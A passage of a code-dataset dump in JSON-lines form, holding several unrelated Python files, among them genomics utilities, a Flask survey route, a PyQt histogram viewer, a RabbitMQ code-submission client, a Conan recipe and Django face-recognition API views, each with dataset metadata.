= hues[:m]\n h2 = hues[m:]\n hues[::2] = h1\n hues[1::2] = h2\n\n hsv_colors_list = [(h, s, v) for h in hues]\n return hsv_colors_list\n\n\ndef color_gradient(hsv: tuple, n: int) -> List[tuple]:\n \"\"\"\n Based on the input HSV color,\n return a list of n tuples with HSV colors\n of increasing brightness (saturation + value).\n \"\"\"\n # for fewer samples, select nearby colors\n steps = max(n, 4)\n\n h = hsv[0]\n s = np.linspace(hsv[1], 0.2, steps) # goes down\n v = np.linspace(hsv[2], 1.0, steps) # goes up\n\n hsv_gradient_list = [(h, s[i], v[i]) for i in range(n)]\n return hsv_gradient_list\n\n\ndef unique(sequence):\n seen = set()\n return [x for x in sequence if not (x in seen or seen.add(x))]\n\n\ndef shorten(string, max_length, methods=\"right\"):\n \"\"\"\n shorten a string to a max_length, 
multiple methods accepted.\n \"signs\" and \"vowels\" remove their respective characters from right to left.\n \"left\",\"right\" and \"center\" can be performed afterward if the desired length is not yet reached.\n \"\"\"\n overhead = len(string) - max_length\n if overhead <= 0:\n return string\n\n if \"signs\" in methods:\n signs = [\"-\", \"_\", \".\"]\n s = \"\"\n for l in string[::-1]:\n if l in signs and overhead > 0:\n overhead -= 1\n else:\n s += l\n string = s[::-1]\n\n if \"vowels\" in methods:\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n s = \"\"\n for l in string[::-1]:\n if l in vowels and overhead > 0:\n overhead -= 1\n else:\n s += l\n string = s[::-1]\n\n if \"right\" in methods:\n string = string[:max_length]\n elif \"left\" in methods:\n string = string[len(string)-max_length:]\n elif \"center\" in methods:\n string = string[:ceil(max_length/2)] + string[len(string)-floor(max_length/2):]\n\n return string\n\n\nclass CaptureStdout(list):\n \"\"\"\n Context manager that somehow manages to capture prints,\n and not snakemake log\n \"\"\"\n def __enter__(self):\n self._stdout = sys.stdout\n sys.stdout = self._stringio = StringIO()\n return self\n\n def __exit__(self, *args):\n self.extend(self._stringio.getvalue().splitlines())\n del self._stringio # free up some memory\n sys.stdout = self._stdout\n\n\nclass CaptureStderr(list):\n \"\"\"\n Context manager that somehow manages to capture prints,\n and not snakemake log\n \"\"\"\n def __enter__(self):\n self._stderr = sys.stderr\n sys.stderr = self._stringio = StringIO()\n return self\n\n def __exit__(self, *args):\n self.extend(self._stringio.getvalue().splitlines())\n del self._stringio # free up some memory\n sys.stderr = self._stderr\n\n\ndef prep_filelock(lock_file, max_age=10):\n \"\"\"\n create the directory for the lock_file if needed\n and remove locks older than the max_age (in seconds)\n \"\"\"\n os.makedirs(os.path.dirname(lock_file), exist_ok=True)\n\n # sometimes two jobs start in parallel and try to delete at the same time\n try:\n # ignore locks that are older than the max_age\n if os.path.exists(lock_file) and \\\n time.time() - os.stat(lock_file).st_mtime > max_age:\n os.unlink(lock_file)\n except FileNotFoundError:\n pass\n\n\ndef retry_pickling(func):\n def wrap(*args, **kwargs):\n # we get two tries, in case parallel executions are interfering with one another\n for _ in range(2):\n try:\n return func(*args, **kwargs)\n except FileNotFoundError:\n time.sleep(1)\n else:\n logger.error(\"There were some problems with locking the seq2science cache. 
Please try again in a bit.\")\n            raise TerminatedException\n    return wrap\n\n\nclass PickleDict(dict):\n    \"\"\"dict with builtin pickling utility\"\"\"\n    def __init__(self, file):\n        self.file = file\n        self.filelock = f\"{file}.p.lock\"\n\n        data = self.load() if os.path.exists(self.file) else dict()\n        super(PickleDict, self).__init__(data)\n\n    @retry_pickling\n    def load(self):\n        prep_filelock(self.filelock, 30)\n        with FileLock(self.filelock):\n            return pickle.load(open(self.file, \"rb\"))\n\n    @retry_pickling\n    def save(self):\n        prep_filelock(self.filelock, 30)\n        with FileLock(self.filelock):\n            pickle.dump(self, open(self.file, \"wb\"))\n\n    def search(self, search_assemblies: list):\n        \"\"\"\n        Check the genomepy database for a provider that serves both genome and annotation for an assembly.\n        If impossible, settle with the first provider that serves the genome.\n        \"\"\"\n        logger.info(\"Determining assembly providers\")\n        for assembly in search_assemblies:\n            if assembly not in self:\n                self[assembly] = {\"genome\": None, \"annotation\": None}\n\n        with open(logger.logfile, 'w') as log:\n            with contextlib.redirect_stdout(log), contextlib.redirect_stderr(log):\n                genomepy.logger.remove()\n                genomepy.logger.add(\n                    log,\n                    format=\"{time:HH:mm:ss} | {level} | {message}\",\n                    level=\"INFO\",\n                )\n                for p in genomepy.providers.online_providers():\n                    search_assemblies = [a for a in search_assemblies if self[a][\"annotation\"] is None]\n                    for assembly in search_assemblies:\n                        if assembly not in p.genomes:\n                            continue # check again next provider\n\n                        if p.annotation_links(assembly):\n                            self[assembly][\"genome\"] = p.name\n                            self[assembly][\"annotation\"] = p.name\n\n                        elif self[assembly][\"genome\"] is None:\n                            self[assembly][\"genome\"] = p.name\n\n                    if all(self[a][\"annotation\"] for a in search_assemblies):\n                        break # don't load the next provider\n\n        # store added assemblies\n        self.save()\n\n    def check(self, assemblies: list, annotation_required: bool, verbose: bool):\n        \"\"\"\n        Check if the genome (and the annotation if required) can be downloaded for each specified assembly.\n        \"\"\"\n        for assembly in assemblies:\n            if self[assembly][\"genome\"] is None:\n                logger.warning(\n                    f\"Could not download assembly {assembly}.\\n\"\n                    f\"Find alternative assemblies with `genomepy search {assembly}`\"\n                )\n                exit(1)\n\n            if self[assembly][\"annotation\"] is None:\n                if verbose:\n                    logger.warning(\n                        f\"No annotation for assembly {assembly} can be downloaded. 
Another provider (and \"\n f\"thus another assembly name) might have a gene annotation.\\n\"\n f\"Find alternative assemblies with `genomepy search {assembly}`\\n\"\n )\n if annotation_required:\n exit(1)\n\n\ndef is_local(assembly: str, ftype: str, config: dict) -> bool:\n \"\"\"checks if genomic file(s) are present locally\"\"\"\n file = os.path.join(config['genome_dir'], assembly, assembly)\n local_fasta = os.path.exists(f\"{file}.fa\")\n local_gtf = os.path.exists(f\"{file}.annotation.gtf\")\n local_bed = os.path.exists(f\"{file}.annotation.bed\")\n if ftype == \"genome\":\n return local_fasta\n if ftype == \"annotation\":\n # check genome and annotations, as genome is always needed\n return local_gtf and local_bed and local_fasta\n","sub_path":"seq2science/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":24544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"643972983","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom server import app\n\nimport sqlite3\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\ndef home():\n\treturn render_template(\"home.html\")\n\n@app.route(\"/response_page\", methods=[\"GET\", \"POST\"])\ndef response():\n\n\n\t\ts = []\n\t\n\t\tstrongagree = 0\n\t\tstrongdisagree = 0\n\t\tyes = 0\n\t\tno = 0\t\n\t\t\n\t\tconn = sqlite3.connect('survey_pool.db')\n\t\tcur = conn.cursor()\n\t\n\t\tcourse = cur.execute(\"SELECT * FROM Gordon_Survey_Response\")\n\t\n\t\tpool = cur.fetchall()\n\n\t\ti = 1\t\t\n\t\tfor i in range(1,len(pool[0])):\n\t\t\tresult = []\n\t\t\tx = i\n\t\t\tresult.append(x)\n\t\t\tif pool[0][i] in range(1,5):\n\t\t\t\tx = 'Level question'\n\n\t\t\telif pool[0][i] in range(5,7):\n\t\t\t\tx = 'Yes or No question'\n\n\t\t\telse:\n\t\t\t\tx = 'Text'\n\n\t\t\tresult.append(x)\n\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\t\n\t\t\tprint (result)\n\t\t\ts.append(result)\n\t\t#print (s)\n\t\tfor res in pool:\n\t\t\ta = 1\n\t\t\twhile a < len(res):\n\t\t\t\tif res[a] not in range(1,7):\n\t\t\t\t\tpass\n\t\t\t\telif res[a] <= 2:\n\t\t\t\t\ts[a-1][2] += 1\n\n\t\t\t\telif res[a] <= 4:\n\t\t\t\t\ts[a-1][3] += 1\n\n\t\t\t\telif res[a] == 5:\n\t\t\t\t\ts[a-1][4] += 1\n\n\t\t\t\telse:\n\t\t\t\t\ts[a-1][5] += 1\t\t\t\t\t\t\n\n\t\t\t\ta += 1\n\t\t#print(s)\n\n\t\t\n\t\treturn render_template(\"response_page.html\",results = s)\n\n\n\n\n\n","sub_path":"templates/student/random/test/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"424104082","text":"class union:\n def __init__(self):\n self.level ={'ui': 'union_individual',\\\n 'ue': 'union_ecosystem'}\n self.group = {'a': 'archaea', \\\n 'b': 'bacteria', \\\n 'ap':'archaea_parsed', \\\n 'bp':'bacteria_parsed', \\\n 'e': 'eukarya', \\\n 'j': 'JGI', \\\n 'all': 'all', \\\n 'allp': 'all_parsed'}\n self.number_of_species = {'union_individual_archaea':188, \\\n 'union_individual_bacteria':183, \\\n 'union_individual_archaea_parsed':105, \\\n 'union_individual_bacteria_parsed':154,\\\n 'union_individual_eukarya':58, \\\n 'union_individual_all': 383,\\\n 'union_individual_all_parsed': 291, \\\n 'union_ecosystem_JGI':309}\n self.lines_in_topo_ave = {'union_individual_archaea':2, \\\n 'union_individual_bacteria':2, \\\n 'union_individual_archaea_parsed':2, \\\n 'union_individual_bacteria_parsed':2,\\\n 'union_individual_eukarya':2, 
\\\n 'union_individual_all': 2,\\\n 'union_individual_all_parsed': 2, \\\n 'union_ecosystem_JGI':2}\n\n def species_name(self, system_name, species):\n species_name = system_name + '-upto-%d'%(species)\n return species_name\n\n def number_of_rxn(self, system_name, species):\n inputfile = open('../data/union/rxn_lists/rxn_%s.dat'%(system_name), 'r')\n inputfile.readline() #header\n nbr_rxn = 0\n for line in inputfile:\n items = line.rstrip().split('\\t')\n label = int(items[0])\n nbr_rxn += 1\n if label > species:\n break\n inputfile.close()\n return nbr_rxn\n\n def load_list_rxn(self, system_name, species):\n rxn_list = []\n inputfile = open('../data/union/rxn_lists/rxn_%s.dat'%(system_name), 'r')\n inputfile.readline()\n for line in inputfile:\n items = line.rstrip().split('\\t')\n label = int(items[0])\n if label > species:\n break\n rxn = items[1]\n rxn_list.append(rxn)\n inputfile.close()\n return rxn_list\n\n def sub_edges(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n edge_list = []\n rxn_list = self.load_list_rxn(system_name, species)\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n for p in kegg.rxn_prod[x]:\n if r == p: ### remove self-loops from sub-sub nets\n continue\n edge_list.append((r, p))\n return edge_list\n\n def rxn_edges(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n edge_list = []\n rxn_list = self.load_list_rxn(system_name, species)\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n edge_list.append((r, x))\n for p in kegg.rxn_prod[x]:\n edge_list.append((x, p))\n return edge_list\n\n def rxn_degree(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n rxn_list = self.load_list_rxn(system_name, species)\n sub_set = set()\n dict_sub_nbrRxn = {}\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n if r not in sub_set:\n dict_sub_nbrRxn[r] = 0\n dict_sub_nbrRxn[r] += 1\n sub_set.add(r)\n else:\n dict_sub_nbrRxn[r] += 1\n for p in kegg.rxn_prod[x]:\n if p not in sub_set:\n dict_sub_nbrRxn[p] = 0\n dict_sub_nbrRxn[p] += 1\n sub_set.add(p)\n else:\n dict_sub_nbrRxn[p] += 1\n return dict_sub_nbrRxn\n","sub_path":"code/mgmnet/union_nets.py","file_name":"union_nets.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"173492736","text":"from macropy.core.macros import *\nfrom macropy.dump import macros, dump, dumpid\nfrom macropy.core.quotes import macros, q, u\nimport pprint\npp = pprint.PrettyPrinter(indent = 4\n)\n_ = None # makes IDE happy\n\nmacros = Macros()\n\n@macros.expr\ndef f(tree, gen_sym, **kw):\n\n\n @Walker\n def underscore_search(tree, collect, **kw):\n if isinstance(tree, Name) and tree.id == \"_\":\n name = gen_sym()\n tree.id = name\n collect(name)\n return tree\n\n tree, used_names = underscore_search.recurse_collect(tree)\n\n new_tree = q[lambda: ast[tree]]\n new_tree.args.args = [Name(id = x) for x in used_names]\n\n dumpid[tree]\n dumpid[real_repr(tree)]\n dumpid[tree]\n\n dumpid[new_tree]\n dumpid[real_repr(new_tree)]\n dumpid[unparse(new_tree)]\n\n return new_tree\n","sub_path":"docs/examples/hygiene/gen_sym/macro_module.py","file_name":"macro_module.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263906309","text":"from PyQt5 import QtWidgets\nfrom ui.histogram_viewer import HistogramViewer\nfrom core.histogram import histogram_match\n\n\nclass 
CentralWidget(QtWidgets.QWidget):\n    \"\"\"docstring for CentralWidget\"\"\"\n\n    def __init__(self, parent=None):\n        super().__init__(parent)\n        self.__createGroups()\n\n    def __createGroups(self):\n        self.inputHistogram = HistogramViewer(self)\n        self.targetHistogram = HistogramViewer(self)\n        self.outputHistogram = HistogramViewer(self)\n        layout = QtWidgets.QHBoxLayout(self)\n\n        inputGroup = QtWidgets.QGroupBox(self, title=\"Input\")\n        inputLayout = QtWidgets.QVBoxLayout(inputGroup)\n        inputLayout.addWidget(self.inputHistogram)\n\n        targetGroup = QtWidgets.QGroupBox(self, title=\"Target\")\n        targetLayout = QtWidgets.QVBoxLayout(targetGroup)\n        targetLayout.addWidget(self.targetHistogram)\n\n        outputGroup = QtWidgets.QGroupBox(self, title=\"Output\")\n        outputLayout = QtWidgets.QVBoxLayout(outputGroup)\n        outputLayout.addWidget(self.outputHistogram)\n\n        layout.addWidget(inputGroup, stretch=1)\n        layout.addWidget(targetGroup, stretch=1)\n        layout.addWidget(outputGroup, stretch=1)\n\n    def openInput(self):\n        filename = self.__openImage(title=\"Open Input Image\")\n        if len(filename) == 0:\n            return\n        self.inputHistogram.loadImage(filename)\n\n    def openTarget(self):\n        filename = self.__openImage(title=\"Open Target Image\")\n        if len(filename) == 0:\n            return\n        self.targetHistogram.loadImage(filename)\n\n    def equalize(self):\n        inputData = self.inputHistogram.getImageData()\n        targetData = self.targetHistogram.getImageData()\n        if len(inputData) == 0 or len(targetData) == 0:\n            msgBox = QtWidgets.QMessageBox()\n            msgBox.setText(\"Please open both images first\")\n            msgBox.exec()\n            return\n\n        data = histogram_match(inputData, targetData)\n        height, width, channel = inputData.shape\n        bpl = 3 * width\n        self.outputHistogram.setImageData(data, width, height, bpl)\n\n    def __openImage(self, title=\"\"):\n        filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, title, \"\", \"Image Files (*.png *.jpg *.jpeg)\")\n        return filename\n","sub_path":"ui/central_widget.py","file_name":"central_widget.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"513003954","text":"#!/usr/bin/python3\nimport signal, os, time\n\ndef handler(signum, frame):\n    global signals,duration,triggercount\n    now = time.time()\n    newsignals = []\n    for sig in signals:\n        if (sig > now - duration):\n            newsignals.append(sig)\n\n    signals = newsignals\n    signals.append(now)\n\n#    print(\"Received signal\")\n\n    if len(signals) == triggercount:\n        os.system(\"/usr/local/bin/wakemarge.sh\")\n        signals=[]\n\n\nsignals=[]\nduration = 2\ntriggercount = 3\n\nsignal.signal(signal.SIGUSR1, handler)\n\nwhile True:\n#\tprint('About to wait')\n\tsignal.pause()\n#\tprint('Continuing after signal')\n","sub_path":"pitunes/lirc/usr/local/bin/remoted.py","file_name":"remoted.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"397807493","text":"\"\"\" Student-side machine program\n\n@Author: Jintu Zheng\n@Date: 2020-12-28\n\nThis process can submit at most Threads_limit pieces of code at the same time. After each piece of code\nis submitted it is sent to the message queue, and the submitting thread then waits a while and queries\nthe persistence-layer cache server for the judging result that belongs to it\n(one cache-query thread that accesses the persistence-layer cache server over the web).\nOnly then does that submission thread finish.\n\nAfter one piece of code is submitted we do not stop the user from submitting more; even if the first\npiece has not been judged yet, the front end feels no congestion and a second piece can still be\nsubmitted. To be safe, however, Threads_limit caps how many pieces of code can be submitted at once.\n\nA submission thread only truly ends once it has retrieved its own judging result from the cache server.\n\"\"\"\n\nfrom pika import PlainCredentials, BlockingConnection, ConnectionParameters\nimport json\nimport random\nimport threading\nimport time\nfrom utils import current_datetime, gen_task_ID, getFiles\nfrom queue import Queue\nimport requests\nimport json\n\nMQ_USER_NAME = 'guest' # MQ username\nMQ_USER_PASSWORD = 'guest' # MQ password\nHOST_NAME = 'localhost' # MQ network address\nHOST_PORT = 5672 # MQ port\nCACHE_PORT = 1234 # persistent cache port\n\nThreads_limit = 4 # a single process on this student machine can submit at most 4 pieces of code at once\ncredentials = PlainCredentials(MQ_USER_NAME, MQ_USER_PASSWORD) # create credentials from the MQ username and password\n\ndef send_msg_to_MQ(msg_data): # Build connection -> build channel -> send message\n    # build the connection, open a channel, then send the message\n    connection = BlockingConnection(ConnectionParameters(host = HOST_NAME, port = HOST_PORT, virtual_host = '/',credentials = credentials))\n    channel = connection.channel()\n    result = channel.queue_declare(queue = 'un_judged') # declare the message queue the messages travel through; created if it does not exist\n    \"\"\"\n    data:\n    msg_data;\n    @key='TaskID' value->str # unique task ID (auto-generated)\n    @key='studentNumber' value->str # student number\n    @key='code' value->str # the code to be judged\n    @key='time' value->str # the current time (auto-generated)\n    \"\"\"\n    TID = gen_task_ID(msg_data['studentNumber'])\n    message = json.dumps({'TaskID':TID,'code':msg_data['code'],'time':current_datetime(),'studentNumber':msg_data['studentNumber']}) # build msg\n    channel.basic_publish(exchange = '',routing_key = 'un_judged',body = message) # push the message onto the queue; routing_key is the queue name\n    connection.close()\n    return TID\n\n\ndef get_student_code()->str:\n    # this performs file I/O\n    fl = getFiles('student_codes')\n    random_ID = random.randint(0,(len(fl)-1)) # randomly pick one code file to read\n    with open(fl[random_ID], 'r', encoding='utf-8') as f:\n        code_content = f.read() # read that code file\n    return code_content\n\n\n# query the persistent cache server with a requests POST\ndef call_check_from_cache(TID):\n    try:\n        request_url = \"http://\"+HOST_NAME+\":\"+str(CACHE_PORT)\n        headers = {'content-type': 'application/x-www-form-urlencoded'}\n        response = requests.post(request_url, data={'tid':TID}, headers=headers)\n        if response:\n            pack = response.content\n            result = json.loads(pack)\n            return result # the judging result found on the cache server\n    except Exception as e:\n        print(e) # print unexpected errors\n        return None\n    return None\n\n\n# the thread that submits code and the polling for its judging result are paired\n# thread used to submit code\nclass Summit(threading.Thread):\n    def __init__(self):\n        super(Summit, self).__init__()\n    \n    def run(self):\n        studentNUmber = str(random.uniform(000000,999999)) # generate a random student number\n        code = get_student_code()\n        msg = {}\n        msg['studentNumber'] = studentNUmber\n        msg['code'] = code\n        print(msg)\n        TID = send_msg_to_MQ(msg)\n        # Student refresh: equivalent to the student refreshing their judging result in the client\n        # poll the cache server until the result arrives (pausing the thread briefly before each poll)\n        while(True):\n            result = call_check_from_cache(TID) # query the persistence-layer cache server; keep waiting if there is no result yet\n            print('Student thread task {} is polling the cache server and waiting for the judging result'.format(TID))\n            if result!=None: # once we have a result\n                print(result)\n                break\n    \n\nif __name__ == \"__main__\":\n    # this student machine generates code, submits it, and asynchronously queries the judging result\n    codes_summit_threads = []\n    for i in range(Threads_limit):\n        summit = Summit()\n        summit.start()\n        codes_summit_threads.append(summit)\n    \n    for t in codes_summit_threads:\n        t.join()\n    ","sub_path":"student_machine.py","file_name":"student_machine.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"186940469","text":"import ClassNLOper_C2\nimport ClassToRepr\nimport numpy as np\n\nclass ClassHyperH():\n    def __init__(self,X):\n        self.X=X\n        self.H=ClassNLOper_C2.H(X)\n        if self.X.FilterOrder!=None:\n            self.Repr=ClassToRepr.ClassToRepr(X)\n\n\n        self.RandomMapRepr=None\n\n    def HR(self,xi,it0,it1,ToRepr=True,ToVec=True,Noise=None,Zero=False,CorrectJ=False):\n        DicoData=self.H(xi,it0,it1,Noise=Noise,Zero=Zero,CorrectJ=CorrectJ)\n\n        # DicoData=self.DoubleBuffer(DicoData)\n        if ToRepr:\n            DataRepr=self.Repr(DicoData,ToVec=ToVec)\n        else:\n            DataRepr=DicoData[\"data\"]\n\n        if 
self.RandomMapRepr!=None:\n DataRepr=DataRepr[self.RandomMapRepr]\n\n return DataRepr\n\n def R(self,Data,ToVec=True):\n DataRepr=self.Repr(Data,ToVec=ToVec)\n if self.RandomMapRepr!=None:\n DataRepr=DataRepr[self.RandomMapRepr]\n return DataRepr\n\n def setPSFMode(self,PSFMode=False):\n ListDicoRepr=self.Repr.ListDicoRepr\n for DicoRepr in ListDicoRepr:\n if DicoRepr['Type']=='Image':\n DicoRepr[\"Oper\"].Imager.DoPSF=PSFMode\n\n\n def DoubleBuffer(self,DicoData):\n\n uvw=DicoData[\"uvw\"]\n data=DicoData[\"data\"]\n A0Vec,A1Vec=DicoData[\"A0A1\"]\n flags=DicoData[\"flags\"]\n \n uvw=np.concatenate((uvw,-uvw))\n data=np.concatenate((data,data.conj()))\n A0Vec1=np.concatenate((A0Vec,A1Vec))\n A1Vec1=np.concatenate((A1Vec,A0Vec))\n A0Vec=A0Vec1\n A1Vec=A1Vec1\n flags=np.concatenate((flags,flags))\n \n DicoData[\"uvw\"]=uvw\n DicoData[\"data\"]=data\n DicoData[\"flags\"]=flags\n DicoData[\"A0A1\"]=A0Vec,A1Vec\n DicoData[\"nbl\"]=2*DicoData[\"nbl\"]\n return DicoData\n","sub_path":"HyperCal/PredictDir/ClassHyperH.py","file_name":"ClassHyperH.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158823214","text":"import os\nimport shutil\n\nfrom conans import ConanFile, tools\n\n\nclass tinyxml(ConanFile):\n name = 'tinyxml'\n version = '1.0.1'\n url = 'https://github.com/wsbu/conan-packages'\n homepage = 'http://www.grinninglizard.com/tinyxml/'\n description = 'TinyXML is a simple, small, C++ XML parser that can be easily integrating into other programs.'\n settings = 'os', 'compiler', 'build_type', 'arch', 'platform'\n license = 'See license file'\n\n scm = {\n 'type': 'git',\n 'url': 'git@bitbucket.org:redlionstl/tinyxml.git',\n 'revision': '82e488fd7e9016170cc222f4a1b85dc57fdd29a0'\n }\n\n def build(self):\n extra_env_vars = {\n 'BUILD_TARGET': str(self.settings.platform),\n 'GPP': tools.get_env('CXX', 'g++')\n }\n with tools.environment_append(extra_env_vars):\n self.run('make --jobs ' + str(tools.cpu_count()))\n\n def package(self):\n lib_name = 'libtinyxml.so.' 
+ self.version\n self.copy(lib_name, dst=os.path.join('usr', 'lib'))\n os.symlink(lib_name, os.path.join(self.package_folder, 'usr', 'lib', 'libtinyxml.so.1'))\n os.symlink(lib_name, os.path.join(self.package_folder, 'usr', 'lib', 'libtinyxml.so'))\n\n self.copy('*.h', dst=os.path.join('usr', 'include'))\n\n src_license = os.path.join(self.source_folder, 'COPYING')\n license_folder = os.path.join(self.package_folder, 'etc', 'license')\n dst_license = os.path.join(license_folder, self.name)\n os.makedirs(license_folder)\n shutil.copy2(src_license, dst_license)\n\n def package_info(self):\n self.cpp_info.libdirs = [os.path.join('usr', 'lib')]\n self.cpp_info.includedirs = [os.path.join('usr', 'include')]\n self.cpp_info.libs = ['tinyxml']\n","sub_path":"tinyxml/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501004529","text":"import face_recognition, os, cv2\nfrom rest_framework import status\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework.generics import ListCreateAPIView\nfrom .models import Candidateface\nfrom .permissions import IsAuthenticated\nfrom .serializers import FacerecognitionSerializer,CandidatefaceSerializer\nfrom .pagination import CustomPagination\n\nclass get_post_candidate(ListCreateAPIView):\n serializer_class = CandidatefaceSerializer\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n \n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Get all candidates\n def get(self, request):\n candidates = self.get_queryset()\n paginate_queryset = self.paginate_queryset(candidates)\n serializer = self.serializer_class(paginate_queryset, many=True)\n return self.get_paginated_response(serializer.data)\n\n # Create a new entry\n def post(self, request):\n serializer = CandidatefaceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass post_recognise(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Check the image and tell the name\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n candidate_list = Candidateface.objects.filter()\n unknown_face = face_recognition.load_image_file(file_serializer.data['Check_Img'])\n try:\n candidateEncodedImages = list()\n known_faces_name = list()\n known_faces_email = list()\n for i in candidate_list:\n candidateEncodedImages.append(\n face_recognition.face_encodings(face_recognition.load_image_file(i.Cand_Img))[0])\n known_faces_name.append(i.name)\n known_faces_email.append(i.email)\n unknown_face_encoding = face_recognition.face_encodings(unknown_face)[0]\n results = face_recognition.compare_faces(candidateEncodedImages, unknown_face_encoding)\n k = 0\n flag = 0;\n for i in results:\n if (i == True):\n res = {'code': '1',\n 'message': 'Recognised',\n 'name':known_faces_name[k],\n 'email':known_faces_email[k]}\n flag = 1;\n k = k + 1\n if (flag == 0):\n res = {'code':'0',\n 'message':'Hey who is this!!'}\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, 
file_serializer.data['Check_Img']))\n except IndexError:\n res = {'code':'0',\n 'message':'Face is not identified in pic'}\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass post_countface(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Create a new entry\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n\n try:\n image = face_recognition.load_image_file(file_serializer.data['Check_Img'])\n face_locations = face_recognition.face_locations(image, 2)\n res = {'code':'0',\n 'message':'Counted',\n 'facecount':len(face_locations)}\n\n except IndexError:\n res = {'code':'0',\n 'message':'Image quality is too poor to read..'}\n\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, file_serializer.data['Check_Img']))\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass post_checklogo(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Create a new entry\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n try:\n img = cv2.imread(file_serializer.data['Check_Img'])\n img2 = img[:, :, 2]\n img2 = img2 - cv2.erode(img2, None)\n template = cv2.imread('temp1.jpg')[:, :, 2]\n template = template - cv2.erode(template, None)\n ccnorm = cv2.matchTemplate(img2, template, cv2.TM_CCORR_NORMED)\n fval = \"{:.2f}\".format(ccnorm.max())\n if (float(fval) > 0.90):\n res = {'code':'1',\n 'message':'Found Similar pattern.'}\n else:\n res = {'code':'0',\n 'message':'Pattern Was not found..'}\n except IndexError:\n res = {'code':'0',\n 'message':'Image quality is too poor to read..'}\n\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, file_serializer.data['Check_Img']))\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)","sub_path":"facerecognition/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"346592183","text":"from distutils.core import setup\nfrom Cython.Build import cythonize\nfrom distutils.extension import Extension\nimport numpy\n\nsourcefiles = ['mean_shift_wrapper.pyx', 'mean_shift.cpp']\ncompile_opts = ['-fopenmp','-std=c++11']\next=[Extension('*',\n sourcefiles,\n libraries = ['gomp'],\n include_dirs=[numpy.get_include()],\n extra_compile_args=compile_opts,\n language='c++')]\n\nsetup(\n ext_modules=cythonize(ext)\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"462980678","text":"\"\"\"tabla usuarios\n\nRevision ID: 7399e3cc6a76\nRevises: \nCreate Date: 2021-05-31 16:41:51.985307\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7399e3cc6a76'\ndown_revision = 
